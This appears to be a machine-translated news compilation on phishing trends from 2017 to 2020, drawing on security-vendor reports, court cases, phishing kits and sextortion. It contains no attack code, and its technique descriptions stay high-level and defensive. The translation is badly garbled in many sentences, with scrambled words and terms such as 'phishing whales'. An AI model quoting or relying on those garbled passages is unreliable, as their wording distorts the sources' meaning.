According to the Group-IB Hi-Tech Crime Trends 2020-2021 report, 118% more phishing resources were identified and blocked during the analyzed period than before. Analysts attribute this growth to several reasons, the main of which is the pandemic: web phishing as one of the simplest earning schemes attracted the attention of a larger audience that lost revenue. The increase in demand for purchases over the Internet played into the hands of phishers: they quickly adjusted to the "new reality" and began to conduct phishing attacks on services and individual brands, which previously had no special economic effect for them.
A change in tactics is also noticeable. In previous years, attackers stopped their campaigns after blocking fraudulent web resources and switched to other brands. Now they automate the attack, bringing new phishing units to replace blocked ones.
Since the beginning of the year, there has been an increase in advanced social engineering, where multi-way scenarios are used in a phishing attack. In such phishing schemes that are gaining popularity, the victim is pre-worked out - contact is established with her (for example, through a messenger), an atmosphere of legitimacy of actions is created around her and only after that they are sent to the phishing page. This year's trend was the use of one-time links. The user receives a unique link that becomes inactive after the first open. If he went to the link at least once, then it will not be possible to get the same content again to collect an evidence base. And without it, the process of blocking a phishing resource is significantly complicated.
The largest amount of phishing was created for online services (39.6%). This includes phishing for collecting accounts, Microsoft,, Netflix, Amazon EBay Valve Steam, etc. This is followed by postal services (15.6%), financial institutions (15%), (14.5 cloudy storages %), payment services (6.6%) and a "novice" list - bookmakers (2.2%). Phishing resources aimed at cryptocurrency projects have almost disappeared due to the fading interest in ICO projects, which during 2017-2018 were popular with phishers.
Group-IB: Russia Domain Theft Scheme
On November 19, 2020, a company Group-IB specializing in, announced cyber security a scheme used by hackers to steal legal domains in, Russia which are subsequently domains used for. phishing attacks More. here
Avast: almost half of Russians faced phishing attacks
On October 28, 2020, it became known that the company, Avast a representative from the field of digital security and security solutions, published the results of its survey - according to the results received, to data 42% Russians faced phishing, 27% were its victims, and a little more than a third (35%) could not give an accurate answer. Two thirds of phishing respondents to the attack were affected by personal issues, and one third were affected by work tasks.
In Russia, most often people encountered telephone phishing.
Attackers can conduct phishing attacks through a variety of channels, so it is important that people know about them and about current schemes. From January to September 2020, Avast defended an average of 2770 out of 100,000 Russians from phishing attacks every month, "says Alexei Fedorov, head of Avast's representative office in Russia and the CIS. |
Of the Russians who were victims of phishing, a little more than a quarter (27%) said that they had to change their passwords from accounts, 13% said that they had stolen money from them, and 11% stole personal data from them. 11% of victims had to cancel credit or debit cards.
Of those who suffered financial losses, 43% lost up to 3,500 rubles, every fifth (20%) lost from 3,500 to 6,999 rubles, 11% lost from 7,000 to 13,999 rubles, 5% - from 14,000 to 20,999 rubles and one of five (20%) more than 21,000 rubles.
Social engineering is used in phishing attacks to force people to commit the actions the cybercrime needs. Attackers affect the behavior, psyche of the victim, since it is easier to deceive a person than to hack the system, - says Tatyana Shemyakina, psychologist, expert in social psychology. - Fraudsters play with emotions of people, use fear, put pressure on the victim. They may frighten with urgency, make them worried, nervous, or say that they need charitable donations. |
Three out of five (61%) Russians affected by phishing did not report fraud. The main reasons why people do not report fraud: they think that the attack is not worth the trouble (30%), they do not know who to report it to (29%), they are sure that nothing will happen anyway if they report (29%), they believe that the information they received is not worth anything (23%).
Of the phishing victims who reported the attack, almost half (49%) reported fraud to the police, 43% to the company whose employee the attacker pretended to be, 26% reported this to their colleagues and 16% told their. to provider e-mail
Australia has launched a national program to block phishing SMS using a blockchain
September 15, 2020 it became known about the launch in Australia of a national program to block phishing SMS. The decision uses blockchain technology, the local telecommunications company Telstra takes part in the project. More details here.
The court allowed Microsoft to seize control of 6 phishing domains
In July 2020, [Microsoft] received a court order to gain control of six domains used in phishing attacks on Office 365 users, including with the operation of the COVID-19 theme.
According to court documents, Microsoft aimed at a cybercrime group that had been "phishing" and attacking the company's customers since December 2019. Attackers sent emails to companies using mail servers and corporate infrastructure in the Office 365 cloud service[11].
Phishing letters were sent on behalf of work colleagues and trusted business partners. The malicious operation in question differed from others in that attackers did not forward victims to fake Office 365 authorization pages, but used Office documents. When trying to open the file, users were redirected to a page that requires the download of a malicious fake Office 365 application.
After the victim installed the app, the attackers gained full access to her Office 365 account (settings, files, email content, contact lists, notes, etc.). In other words, the application allows cybercriminals to gain full access to their account without having to steal a password, only using OAuth2 tokens.
Microsoft filed a civil lawsuit on June 30 this year and indicated in a statement of claim six domains used by cybercriminals to host the Office 365 malicious application. According to the company, two people are behind the phishing operation. Initially, they indicated in the subject of letters issues related to business, but quickly switched to the topic of coronavirus.
Attackers use fake CVs to distribute malware
On June 5, 2020, the company Check Point reported that as unemployment researchers grow, they find malicious files those masquerading as CV -- a special form of resume. Attached to the e-mail files in the format were Microsoft Excel with such topics as "job application" or "about work." When the victims opened the attached files, they were asked to "include the content." In fact, after that, the victims downloaded malware ZLoader. This is a bank malware designed to steal accounts data and other private information from users of target financial institutions. Malware can also steal files passwords cookie stored in web victims.browsers Using stolen information, it can malware allow you to malefactors to connect to the victim's system and make illegal financial transactions from a bank user's device.
Check Point researchers note an increase in the number of fraudulent topics in the United States. In April-May 2020, the number of malicious files simulating CV doubled. Overall, 1 out of 450 malicious files identified was associated with a CV.
In addition, Check Point researchers discovered malicious medical forms of vacation. Documents that use names such as "COVID-19 FLMA CENTER.doc" infect victims with malicious ON IcedID, bank malware intended for, banks suppliers, payment cards mobile service providers, as well as Internet store stores. Malware is designed to force users to leave their credentials on a fake page. This information is then sent to the server attacker in addition to information about authorizations that can be used to hack user accounts. The documents were sent e-mail with the topics: "Attached below is a new form for employee leave requests under the Family and Leave Act medical (FMLA)." Emails were sent from different domains senders, such as "medical-center.space," to encourage victims to open malicious attachments.
"Unemployment is rising, and cybercriminals cannot be inactive at this time. They mimic summaries to obtain valuable information, especially that relating to money and banking. I urge anyone who opens an email with a resume to think twice. You can regret it very much, " noted Omer Dembinski, Check Point Cyber Research Manager |
Check Point statistics for June 2020:
- In May, 2020 250 domains containing the word "employment" were registered there is an employment. 7% of these domains were malicious and another 9% suspicious
- 1 out of every 450 malicious files detected -- CV fraud: double that of the last two months
- The total number of malicious attacks increased by 16% compared with the period from March to April, when the pandemic was in its midst.
- In May 2020, Check Point experts noted an average of more than 158,000 coronavirus-related attacks each week. Compared to April, this is a decrease of 7%.
- Over the past 4 weeks, 10,704 coronavirus-related domains have been registered. 2.5% of them were malicious (256 domains) and another 16% (1744 domains) suspicious
According to Check Point, to stay safe, you need:
- 1. Keep track of similar domains. Monitor spelling errors in emails and websites.
- Be more careful with unknown senders. Be careful with files that are received by email from unknown senders, especially if they request a specific action that is not normally done.
- Use valid sources. Make sure that the goods are ordered from a genuine source: it is best not to click on advertising links in emails, but to find the right seller in Google, and click on the link on the Google results page.
- Beware of "special" offers. A "150-year-old coronavirus cure" dollars-- if offered, it's hardly credible.
- Do not use the same password more than once. Ensure that the individual password is used for each application and for each account.
Users are GitHub attacked by fishers
On April 18, 2020, it became known that the GitHub platform's Incident Response Team (SIRT) warned users of a phishing campaign in which attackers steal accounts data through landing pages issued by them as authorization pages. GitHub More. here
2019
The number of phishing whales on the market has more than doubled
On April 15, 2020, the company Group-IB announced that the market recorded a sharp increase in sales of phishing whales - "designers" for the mass creation of phishing sites. In 2019, the number of such "goods" on underground forums more than doubled. The growth in demand for one of swindlers the most popular tools worldwide also affected the average price: it increased by 149%. Group-IB experts explain the growing popularity of phishing whales as a low threshold for entering this market and the simplicity of implementing a earnings scheme.
Phishing Kit is an archive file that contains scripts necessary to create and operate a phishing site. This tool allows attackers who do not have deep programming skills to quickly deploy hundreds of phishing pages, often using them as "mirrors" of each other. When blocking one such site, the fraudster activates the other, when blocking this - the next and so on. Thus, the phishing kit allows attackers to quickly resume the operation of malicious resources, providing their own invulnerability. This explains the interest in them by cybersecurity specialists. Detection of phishing sets not only allows you to find hundreds or even thousands of phishing pages, but, more importantly, can serve as a starting point for investigations to identify their developers and hold them accountable.
According to the Group-IB Threat Hunting Intelligence team, which analyzed hundreds of underground forums, in 2019 the number of active sellers of phishing sets increased by more than 120% compared to the previous year. As expected, the number of unique announcements placed on these resources has also more than doubled.
The cost of phishing recruitment has also increased, doubling in 2019 compared to last year. So, on average, the developers asked for $304 for a phishing whale, and in general, prices ranged from $20 to $880. For comparison, in 2018, prices for phishing sets ranged from $10 to $824, and the average value was $122. As a rule, the cost of phishing sets depends on their complexity, namely on the quality and number of phishing pages, as well as the availability of additional services, such as, for example, technical support from the developer.
Sometimes phishing kits are offered on forums for free. This is not due to the generosity of the sellers, but to the likely presence of backdoors in them, which allow their authors to access compromised data.
Last year, the Group-IB Threat Intelligence system discovered more than 16,200 unique phishing sets. However, their detection is constantly complicated: cybercriminals try to hide the use of the fish whale, remove it from the code or resort to various methods of concealment. So, only 113,460 out of 2.7 million, that is, 4% of detected phishing pages revealed "traces" of the phishing sets used.
The number of unique e-mail addresses found in them also indicates an increase in demand for phishing sets: according to the Information Security Incident Response Center (CERT-GIB Computer Emergency Response Team - Group-IB), last year this figure increased by 8%. This may indicate an increase in the number of their operators.
To attract buyers, phishing set developers use well-known brands with a large audience in them, which in theory should facilitate the implementation of fraudulent schemes for future owners of such sets. In 2019, Amazon, Google, Instagram, Office 365 and PayPal were the most commonly used brands in phishing sets, and Exploit, OGUsers and Crimenetwork were introduced to the Top 3 online sites for trading phishing sets.
"Phishing set developers are the driving force behind the phishing business worldwide. One person can be behind the creation of hundreds of phishing pages and make thousands of dollars from it, for a long time going unnoticed. Therefore, the focus of cybersecurity specialists should shift from blocking phishing pages to finding and identifying the creators of fish whales. In the practice of Group-IB there are a number of investigations, thanks to which it was possible to reveal the identities of the developers of phishing sets. By sharing such information with the relevant law enforcement agencies and ensuring the detention of cybercriminals, Group-IB aims to prevent the further spread of this "disease" and combat not its manifestations in the form of phishing pages, but with its pathogens - the creators of phishing sets, making their work economically unprofitable, " |
Over the years, Group-IB has accumulated an extensive base of phishing sets, which allows you to fight phishing aimed at a specific brand. This base is regularly enriched: once the Group-IB Threat Intelligence system detects a phishing page corresponding server it is scanned to the presence of phishing sets.
Fraudulent use of technology company names and social networks in phishing schemes
On February 11, 2020, the company IBM published the annual IBM X-Force Threat Intelligence Index 2020, which showed how methods have changed cybercriminals over several decades of illegal access to billions of corporate and personal records and the use of hundreds of thousands of vulnerabilities in software. According to the study, 60% of primary intrusions infrastructure into victims were carried out using previously stolen accounts data and known vulnerabilities, which ON allowed to malefactors less reliance on deception of users to get access to the data.
The more users learn about phishing letters, the more targeted attacks become. Together with the non-profit organization Quad9, IBM experts have revealed an increasing trend in the field of phishing: criminals impersonate large consumer technology brands (technology companies, social networks, streaming services) and fake links to their sites for the purpose of phishing. More details here.
27% of attempts at all phishing attacks occur through email
On February 7, 2020, it became known that a team of Check Point researchers at Research, a division Check Point Software Technologies that is a provider of field solutions cyber security around the world, published its report on brands that are most often used in phishing attempts for the 4th quarter of 2019. Attackers most often imitated brands to steal personal or information user accounts data during the last quarter - it contains the largest number of sales during the year.
In phishing attacks, attackers try to create a site-copy of the official site of a well-known brand, using a domain name or URL, web page design similar to an authentic site. A link to a fake website can be sent to victims by email or in messages, redirected while browsing the web, or launched from a fake mobile application. A fake website often contains a form designed to steal user credentials, payment details, or other personal information.
Top brands that attackers tried to use in phishing attempts in the 4th quarter of 2019:
Ranked by the number of their total appearances in phishing attempts:
- Facebook (18% of phishing attacks worldwide)
# Yahoo (10%) # Netflix (5%) # PayPal (5%) # Microsoft (3%) # Spotify (3%) # Apple (2%) # Google (2%)
- Chase (2%)
- Ray-Ban (2%)
Top ways to distribute phishing messages:
During the fourth quarter, researchers observed differences in the distribution of phishing pages: each category of brands distributed in its own way. For example, phishing pages of social networks and banks were mainly distributed through mobile devices. Phishing letters dedicated to the sale period, such as Black Friday in November 2019, were usually distributed through email.
Email (27% of all phishing attacks in Q4):
- Yahoo!
- Rbs (Ray-Ban Sunglasses)
- Microsoft
# DropBox
Websites (48% of all phishing attacks in Q4):
- Spotify
- Microsoft
- PayPal
Through mobile devices (25% of all phishing attacks in Q4):
- Chase Mobile Banking
- Apple
- PayPal
Cybercriminals use different methods of attack to trick their victims into entering personal information, credentials or transferring money. Often links to phishing sites come through spam, but sometimes attackers, having received user credentials, carefully study the victim for several weeks and work on a targeted attack on partners, company customers on behalf of their victim to steal money. This method allows hackers to disguise themselves as a confidant. Over the past two years, the number of attacks of this type has increased, and in 2020 phishing will continue to pose a serious threat, says Vasily Diaghilev, head of Check Point Software Technologies in Russia and the CIS
|
The Check Point Phishing Report is based on ThreatCloud intelligence, a collaborative cybercrime network that provides data on threats and trends from a global threat sensor network. Data Base ThreatCloud contains more than 250 million addresses analyzed for bots, more than 11 million malware signatures and more than 5.5 million infected websites, as well as identifies millions of types every day. malware
Kaspersky Lab solutions prevented 38 million attempts to switch to fraudulent sites every month
According to Kaspersky Lab statistics, in 2019 the number of phishing attacks increased significantly, during which attackers, as a rule, try to get personal and payment data of users. This was announced by Kaspersky on January 28, 2020. During this period, Kaspersky Lab solutions prevented an average of 38 million attempts to switch users to fraudulent sites every month. Fisher closely follows the news agenda and uses the public's interest in various major events and celebrities, inventing official-looking decoys and tricks forcing a person to click on a malicious link or leave personal data. More details here.
Hackers with special training attack government agencies around the world
Anomali Inc. experts discovered in December 2019 a large-scale phishing campaign aimed at government agencies around the world. Presumably, its operators are interested in information about centralized procurement projects and tenders[12].
The campaign is well organized and appears to be quite effective. Each phishing letter is unique, formed specifically for a specific department for which it is planned to launch an attack. Victims are redirected to specially prepared phishing sites, apparently completely duplicating legitimate resources. But their only real purpose is to steal access details.
Attacked by the governments of Canada, China, Australia, Sweden and the United States. According to experts, attacks are carried out from Turkey or Romania; at least this is where the domains used in attacks are located. However, it is not yet possible to say who controls them.
Microsoft called the most unusual types of fraud on the Internet
Microsoft published a report on malware and cybersecurity trends in 2019 at the end of 2019, in which it also spoke about the increase in the activity of phishing attacks[13][14]
According to Microsoft, the number of phishing letters discovered increased from 0.2% in January 2018 to 0.6% in October 2019. While the number of phishing attacks has increased, the total number of extortion software, cryptomainers and other malware has decreased.
In her blog, the company spoke about the three most complex phishing attacks identified this year.
The first is a multi-level malicious campaign, as a result of which cybercriminals poisoned Google search results. Fraudsters first directed web traffic intercepted from legitimate sites to their own resources. Having reached the top of Google search results by keywords, criminals sent emails to victims with links to these search results. If the user clicked on a similar link, and then on a popular search result, he got to the site, where he was redirected to a phishing page.
Another malicious campaign was identified in August. Fraudsters used malicious user pages with error 404 to carry out fraudulent attacks. While most phishing emails contain a link to a fraudulent URL, in this campaign, attackers used links to non-existent pages. Microsoft security systems during link scanning detected error 404 and considered the link safe, while in reality the user was redirected to a malicious site. Using algorithms for generating subdomains and constantly changing the domain allowed attackers to create a large number of phishing URLs.
The third phishing campaign was to carry out MitM attacks. Attackers collected information related to the target company (logos, banners, text and background images) from the Microsoft website, and using these elements created their own phishing site, which was practically no different from the present. Next, phishers sent letters with URLs that simulate authorization pages. The victims had the impression that they were on a legitimate page, but the URL displayed in the address bar of the browser could give a catch.
There is an increase in phishing letters with sexual extortion (sextortion)
Over the past few months, millions of threatening letters have been sent to users from around the world. Starting with Germany, and then switching to the UK and other countries, mainly the USA and Canada, anonymous cyber criminals attacked residents of Western countries with phishing letters. These reports usually claim that the perpetrators have a record of a potential victim made without her consent in her personal time (usually an intimate record) and that these records will be distributed to her friends, family members and co-workers if the victim does not agree to pay a certain ransom. As a rule, cyber criminals provide their potential victim with instructions on how to make a payment using various cryptocurrencies[15]
What if you received such an email?
The best thing you can do when you receive a letter trying to blackmail you is to ignore it. Quite often, when you read such a letter, you can see that it is not personalized, and that it is a mass mailing. In most cases, ignoring a letter is the best thing you can do. If you feel that the letter is quite real, and you are very concerned about it, then in this case you better report it to the local police.
What should NOT be done when receiving such a letter?
Just don't open the letter. If you receive such an email in your mailbox, all you need to do is remove it and live on with your life. However, if you did open the letter, we advise you not to pay the ransom. Paying ransoms to criminals may not be your only problem: transferring money to strangers can cause state security agencies to contact you, since such a transfer can sponsor terrorist groups. You never know exactly who will get your money, and therefore the best solution is NEVER to pay them. Confronting hackers is also not the best idea: telling them names or interacting with them, you just make yourself an easier victim. Do not attract additional attention from the outside. hackers
Another important point is not to personally receive such messages at your own expense: daily cyber criminals send millions of messages. Most likely, they don't even know who you are, and your email address is just on their spam list. In short, try not to open such letters, and if for any reason you did it, then never click on any links in the text of the letter and do not open any attachments to them.
Who's behind these extortion letters?
It is currently unknown whether this attack is sponsored by any states or whether individual hackers are behind it. However, it is known that whoever they are, they want profit and they are technically experienced for the successful implementation of large-scale campaigns without any consequences for themselves. Today we live in a modern world where hackers can be either in a house next to you, or on a distant island in the Caribbean or in the center of the Amazon rainforest in Brazil.
How did they target you?
The question we usually hear is how these blackmailers were able to find your email address and targeted you. Over the past few years, there have been several data breaches, and hackers have stolen billions of email addresses. Often, such email address databases are sold on the black market on the shadow Internet, and almost everyone can come and download the address list to launch their email campaign. Despite the fact that these phishing letters are usually easy to identify, but when criminals send several million letters, at least a few people are necessarily caught in this deception. Hackers expect that even a small percentage of people who received the letter will still follow the instructions and transfer money to their accounts.
How not to be a victim?
Some e-mail service providers, such as Gmail and Yahoo, filter such emails quite well. Therefore, it is safe to say that a significant percentage of fraudulent letters sent to you will never really get to you, because they will not be able to overcome these filters. However, hackers are becoming more creative. If you want to be protected a little better, then you should install premium antivirus on all your devices that are connected to the Internet.
The organizer of phishing attacks will pay its victims more than $1.1 million
Cybercriminals attacking large companies such as Uber, Sainsbury's, Nectar, Groupon, T Mobile, AO.com and Argos will pay[16] more than $1.1 million in compensation to victims of phishing attacks[17].
Grant West, 27, known online as Courvoisier, began his phishing campaign in 2015. He attacked popular companies to access the financial data of a dozen thousand customers, who then sold in the darknet for various cryptocurrencies. According to the results of the investigation, West was identified as the leader of the Organized Crime Network group, which attacked organizations located in London. Along with financial data, he also sold instructions for cyber attacks.
Law enforcement officers during the operation codenamed "Operation Draba" confiscated all the funds of the offender. Also in West's house, an SD card was discovered with 78 million unique usernames and passwords, as well as data from 63 thousand bank cards. Further investigation revealed that the offender organized attacks from his girlfriend's laptop. A file named "fullz" was found on the device, containing financial information of more than 100 thousand users.
Having studied the case file, the court decided to sell the entire confiscated West digital currency (worth more than £922 thousand) and pay compensation to the victims.
Telecom operators in Europe blocked an average of 20 million phishing attacks monthly
On July 23, 2019, Allot released a report from the Telco Security Trends series. Based on private and industry research, he examines the rise of phishing attacks, their financial implications, and how service providers can help combat this growing threat.
The main findings were reported to include:
- Phishing is a growing problem for users, businesses and service providers around the world. Consumers are the main targets of these attacks, and they demand greater security for their data and financial information. According to Telco Security Trends Report, during the first quarter of 2019, telecom operators in Europe each month blocked an average of 20 million phishing attacks on devices of seven million mobile subscribers.
- Phishing is a global billion-dollar industry. The study showed that over a three-month period, mobile phishing accounted for 35% of all activated locks for customers using the telecom operator's security service. Adware took second place with 34%, ahead of the number of harmful program locks, ransomware and. kriptodzheking
Service providers have the ability to reduce the number of phishing attacks.
- Despite the fact that phishing technically depends on which sources users trust, service providers can proactively protect their subscribers from phishing.
- Service providers should adopt the "Train, warn and protect" approach to protect customers from cybercriminals.
- Phishing protection provides service providers with the opportunity to differentiate themselves and create sources of income, while protecting Internet users.
Over the years, customers of service providers have become direct or indirect victims of phishing, and now is the time to act. As of July 2019, hackers seek to deceive users and convince them to divulge personal and confidential information, skillfully manipulating such human emotions as greed, fear and hope. Thanks to the proactive approach of notifying customers about phishing campaigns, training them on the basics of Internet security and the introduction of anti-phishing technologies for protection at the network level, service providers can not only gain consumer confidence, but also create additional sources of income for themselves. told by Hagai Katz, vice president of strategic cybersecurity accounts at Allot |
2018
Email is the most popular way to deliver malware
According to CERT-GIB, e-mail was finally approved as the most popular method of delivering malicious software in 2018. The ratio of VPO delivery by email and download through a web browser throughout 2018 remained at 12 to 1. At the same time, in the second half of 2018, the share of malware downloads through a web browser decreased to a historical minimum and amounted to about 3%.
According to CERT-GIB, one of the key trends in 2018 was the use of public mail services to send letters containing VPO. So, in the top 5 most actively used by attackers postal domains included popular in, and Russia mail.ru. yandex.ru gmail.com For comparison, in 2017, only one public postal service (mail.ru) was included in this five, the remaining four - domains registered specifically for or malicious mailings simply fake addresses. The trend is explained simply: on the one hand, the authors of phishing mailings strive to use the most trusted addresses - those from which users are used to receiving e-mail. On the other hand, this method of sending is much cheaper - there is no need to register a postal domain, you can use a ready-made one, and if infrastructure one postal service detects suspicious activity, without losing "move" to another.
As in 2017, in 2018, in the vast majority of cases (82%), attackers preferred to deliver VPO in attachment to the letter. The number of facts of using URL links in letters leading to the download of malware in 2018 did not increase significantly - by 10%.
Archives became the favorite format for packaging VPO in 2018. Throughout 2018, more than half of all malicious objects were delivered in the archives. ZIP archives were most popular, which, as a rule, do not require separate software to unpack. They accounted for 20% of all malicious files analyzed as part of the work of CERT-GIB.
In 2018, files with the.exe extension were still popular among intruders, despite the fact that this executable format should have already developed caution for Internet users to work with it. The share of files delivered by VPO using.exe accounted for 12% of all malicious objects analyzed.
In order to bypass traditional malware detection systems, attackers go to various tricks, one of which is sending VPO in archives that require a password to decrypt content. CERT-GIB records a tenfold increase in the number of such archives: in 2017, archives with a password accounted for only 0.08% of the total number of malicious objects, and in 2018 their number grew to 0.9%. In simple attack schemes, the password is usually indicated in a letter with a malicious attachment. Multi-stage attacks using social engineering, use password output at the stage of login to communication with the user, to create trust relationships, the purpose of which is to force the victim to open an archive with malware.
Another known method of bypassing traditional detection systems is to send malicious links with deferred activation. Throughout 2018, CERT-GIB recorded slightly different scenarios targeted attacks when letters were delivered to addressees outside working hours, and at the time of antivirus checking, the link from the letter was unavailable, due to which the malicious letter was successfully delivered. Attackers activated a malicious link exclusively during the victim's working time, when anti-virus scanner they had already "allowed" the delivery of the letter.
"More and more cybercriminals have tools to make sure that the copy being sent is not detected by popular traditional anti-virus tools. But the protection class, based on behavioral analysis, allows you to detect behavior, previously unknown instances of malware and block suspicious activity that antivirus can miss, " noted Yaroslav Kargalev, Deputy Head of CERT-GIB |
49% of phishing sites use SSL to create the illusion of security
According to CERT-GIB, the ratio of phishing resources using a secure connection (SSL/TLS) to the total number of phishing sites shows that attackers are increasingly exploiting a false sense of security among users betting on HTTPS. Statistics show that in the 4th quarter of 2018, almost half of all phishing resources use exactly the "safe connection."
"Users should not rely on the type of connection the site uses as its security criteria. Getting an HTTPS certificate for attackers has become as easy as any other. Online, you can find a large number of services that allow you to do this quickly and for free, " noted Yaroslav Kargalev, Deputy Head of CERT-GIB |
Kaspersky Lab blocked 137 million attempts by users to go to phishing pages
On November 6, 2018, Kaspersky Lab announced that its decisions blocked more than 137 million attempts by users to switch to phishing pages in the third quarter of 2018 - this is 28% more than in the previous period. At the same time, over a third of phishing attacks (35%) fell on organizations of the financial category: banks, payment systems, online stores. All these numerous fake pages were created with one goal - to obtain confidential user data that would open the attackers, among other things, access to private wallets and bank accounts of victims.
However, cybercriminals tried to make money on users in a different way. At the end of the summer of 2018, Kaspersky Lab recorded a surge of fraudulent mailings in spam traffic, in which recipients were demanded a ransom for not disclosing the "compromising material" collected on them. These letters even contained personal data of users - in this way, the attackers tried to convince the victims that they really have important information. The ransom was required in bitcoins, and its amount ranged from several hundred to thousands of dollars, while in different mailings scammers indicated different bitcoin wallets for transferring money. As Kaspersky Lab analysts found out, 17 transactions were made for only one such wallet in one month for a total of about 18 thousand US dollars.
In Russia, fraudsters, of course, tried to use in their interests one of the hottest topics of recent months - pension reform. For example, Kaspersky Lab discovered several mailings with offers to check the amount of pension savings in non-state funds and withdraw money "from retirement." To convince recipients of the legitimacy of letters, attackers referred to non-existent laws and structures (for example, a certain "National Department for the Return of Pension Savings"). For the withdrawal of non-existent savings and "access" to the database with pension accruals, the recipients of the letters were asked to pay a small "duty," which, of course, went into the pocket of fraudsters.
Phishing volumes continue to grow throughout 2018, and at a rather rapid pace. The number of attacks that we recorded only in the third quarter of 2018 was half (and even more) of the value that we discovered in 2017. Many factors contribute to this. Fraudsters constantly invent schemes and tricks, borrow ideas from foreign "colleagues," use various channels for spreading spam and phishing links, and exploit popular topics and events as bait. In general, attackers clearly have no shortage of reasons and tools. |
In order not to become a victim of phishing, Kaspersky Lab recommends that users adhere to fairly simple rules.
- Always verify the authenticity of the address of the sender of the letter and the links contained in it - if you are not sure of their reliability, do not open. If you still find yourself on a site that raises doubts, do not leave any personal data there. If you think that you could randomly pass your password to attackers, change it urgently.
- Use a secure connection, especially when you visit important sites (for example, the Internet banking system). Avoid unsafe public Wi-Fi networks whenever possible. All this will reduce the risk of invisible hits on the phishing page. For maximum confidence, use special network connection security solutions such as Kaspersky Secure Connection.
- Use the right protection solution with anti-phishing technologies - for example, Kaspersky Security Cloud. The program will warn you if you try to go to a fraudulent page and block it.
ICO boom stimulates new wave of phishing attacks
According to a Qrator Labs study, most often companies in the financial sector face phishing (30%) and DDoS attacks (26%). The continued attention to DDoS attacks from the banking sector at a fairly high level is due to a wave of massive DDoS attacks on a number of large Russian banks: in 2016, the websites of many well-known financial organizations from the top 10 were attacked, and on January 28, 2018, the largest DDoS attack on the global financial sector using the Mirai botnet occurred in recent years.
Over the past year, almost half of respondents have experienced at least one DDoS attack. Among the main reasons leading to the financial organization falling into the focus of the organizers of DDoS attacks are the size of the organization and its popularity in the market, as well as the lack of adequate countermeasures introduced to combat DDoS attacks, as a result of which the organization can become easy prey for cyber engines, "said Artem Gavrichenkov, technical director of Qrator Labs. |
According to a Qrator Labs survey, if previously financial institutions sought to build solutions entirely in-house, today most of the surveyed companies (68%) already consider hybrid solutions to be the most effective means of counteracting DDoS (on the client side with the participation of an operator solution, or a distributed network). However, this method also has a number of nuances that need to be taken into account. Hybrid solutions do not compensate for each other's disadvantages, but combine advantages and negative properties in various proportions, which can negatively affect the level of protection.
The industry has not yet developed a clear understanding of such risks: many still rely on hybrid solutions. However, with the growth of threats, we can expect that in the future the market will take this situation more seriously, realizing that combined systems cannot provide protection from entire classes of attacks, "says Artem Gavrichenkov. |
The threat of phishing has increased significantly, including in connection with companies entering the ICO. The relentless excitement surrounding ICOs has led to a high risk of fraud, and average users have no accurate idea how to provide their own protection, and tend to overlook Internet fraud.
In the ICO sector, phishing has become a serious problem, and this allows us to judge that in related industries, for example, in the financial sector, the focus of attackers also shifts towards such a method of gaining access to confidential user data, "said Qrator Labs technical director. |
The average number of attacks on web applications in the financial sector, according to Valarm, is 1,500 per day. The main part of them are automated tools and scanners. This activity of automated tools creates a large information background and complicates the detection of real incidents. Despite the fact that the number of hacks per unit of time as a whole has remained at the same level in recent years, financial institutions are no longer always able to detect and accurately record such incidents in a timely manner.
Cyber bullies send phishing letters under the guise of the 2018 World Cup standings
Check Point Software Technologies, a provider of cybersecurity solutions, on June 19, 2018 announced the identification of a phishing campaign related to the start of the 2018 World Cup. Cyber bullies send an infected file under the guise of a game schedule and standings.
In the attachment of phishing letters, malware called "DownloaderGuide," which is known as a loader of potentially unwanted programs, is hidden. Most often, it is used as an installer of applications, such as a toolbar, advertising software or optimization utilities. Check Point researchers found that phishing includes various executables, all of which were emailed using the theme: "World_Cup_2018_Schedule_and_Scoresheet_V1.##_CB-DL-Manager».
The campaign was first discovered on May 30, 2018 and peaked on June 5, but in the tenth of June, Check Point researchers recorded another surge, which is associated with the start of the tournament.
The company expects new spikes in online fraud and phishing attacks during the 2018 World Cup and urges Internet users to remain vigilant, and organizations are advised to apply a multi-level security strategy that protects against both known malware and zero-day threats.
Phishing is one of the most serious threats to Office 365 users
In April 2018, Microsoft published the Security Intelligence Report on information security threats for the period from February 2017. It is based on data obtained by the company's protective programs and services (Data on the number of detected threats, and not on cases of infection). The information was provided by corporate and private users who agreed to share it with reference to geolocation.
The widespread use of botnets and ransomware viruses led to the fact that the number of devices in Russia that faced cyber threats between February 2017 and January 2018 reached 25-30% on average per month, while the same figure in the first quarter of 2017 was almost half as much - 15%. The highest rates were recorded in Pakistan, Nepal, Bangladesh and Ukraine (33.2% or higher), the lowest in Finland, Denmark, Ireland and the USA (11.4% or lower).
In 2017, methods for obtaining "light prey," such as phishing, were used to obtain credentials and other confidential information from users. According to Microsoft Advanced Threat Protection (ATP), phishing was among the most serious threats in the mailboxes of Office 365 users in the second half of 2017 (53%), 180-200 million phishing letters were detected monthly. In Russia, in particular, 7.01 (in the world - 5.85) phishing sites for each 1000 hosts were discovered. The next most common threats were malware loaders (29%) and Java backdoors (11%).
Cloud applications with low security are another target for attackers. The study found that 79% of SaaS applications for cloud storage and 86% of SaaS applications for collaboration do not provide encryption of either stored or transmitted information. To protect your enterprise infrastructure, organizations must restrict users from using cloud applications that do not use encryption and control this using the Cloud Access Security Broker (CASB).
Another trend in the second half of 2017 is that cybercriminals use legitimate built-in system tools to distribute an infected document (for example, a Microsoft Office document) contained in a phishing letter and download a ransomware. The best way to avoid this kind of threat is to update the operating system and software in a timely manner .
2017
Google: Phishing attacks are more dangerous than keyloggers and data leaks
Google specialists, together with scientists from the University of California at Berkeley and the International Computer Science Institute, published the results of a study of modern cyber threats. According to the report, phishing attacks pose a more serious danger to users than keyloggers and Google password reuse[18][19]
Researchers came to this conclusion by analyzing several black markets for the sale of accounts and credentials. The study looked at data for the period from March 2016 to March 2017.
Experts found more than 788 thousand credentials stolen using keyloggers, 12.4 million credentials stolen through phishing, and 1.9 billion credentials that hit the Network during leaks. At the same time, 12% of accounts compromised during leaks were registered through the Gmail service. In 7% of cases, users reused their Google password to access another account, thus endangering both accounts.
According to Google representatives, from 12% to 25% of the detected passwords were still used by users. Google said that the results of the study will be used, among other things, to reset passwords in compromised accounts.
"In assessing the risks, we found that phishing poses the greatest threat to users. This is followed by keyloggers and data breaches. The probability that the phishing victim's account will be hacked is 400 times greater than the average Google user. This figure is 10 times less for victims of data leaks and about 40 times less for victims of keyloggers, "experts said.
In addition, the researchers also drew attention to the growing tendency to include tools for registering IP addresses and other data to bypass geolocation filters in keyloggers and phishing software. More sophisticated malware options also record phone numbers and user-agent data.
Facebook will pay $100,000 to researchers for the development of targeted phishing detection technology
